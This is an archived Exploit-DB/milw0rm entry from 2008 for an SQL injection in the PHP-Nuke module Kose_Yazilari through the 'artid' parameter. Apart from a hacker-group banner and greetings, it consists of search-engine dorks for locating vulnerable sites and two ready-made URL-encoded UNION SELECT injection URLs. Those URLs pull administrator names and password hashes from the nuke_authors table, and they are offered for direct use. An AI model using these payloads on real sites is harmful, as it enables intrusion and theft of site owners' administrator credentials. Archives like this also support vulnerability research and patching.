PHP-Nuke Module Kose_Yazilari - 'artid' SQL Injection

EDB-ID:

5186


Author:

xcorpitx

Type:

webapps


Platform:

PHP

Date:

2008-02-25


  ##     ##     
   ##   ##      
    ## ##
     ###CoRPITX 
     ###     
    ## ##
   ##   ##
  ##     ##

########################### Turkey ####################################
#                                                                     #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#             
#  PHP-Nuke (Kose_Yazilari) SQL Injection Vulnerability 
#
#######################################################################
#  
#  AUTHOR : xcorpitx
#
#  HOME   : www.Hayalet-hack.com / www.zone-turk.net
#
########################################################################
# WHEN YOU PUT THIS SQL CODE YOU can SEE ADMýN NAME,ADMIN HASH 
########################################################################
#
#  DorK  1 : ''name Kose_Yazilari op viewarticle artid''
#  Dork  2 : ''name Kose_Yazilari op printpage artid''
########################################################################
#            
#  EXPLOIT: 
#
########################################################################
# 
#
modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors
#
# 
#
modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors
#
########################################################################

Thank my friends : pc faresi, hayalet,D3ng3s!z,SmoKin,apex,mostbiq

# milw0rm.com [2008-02-25]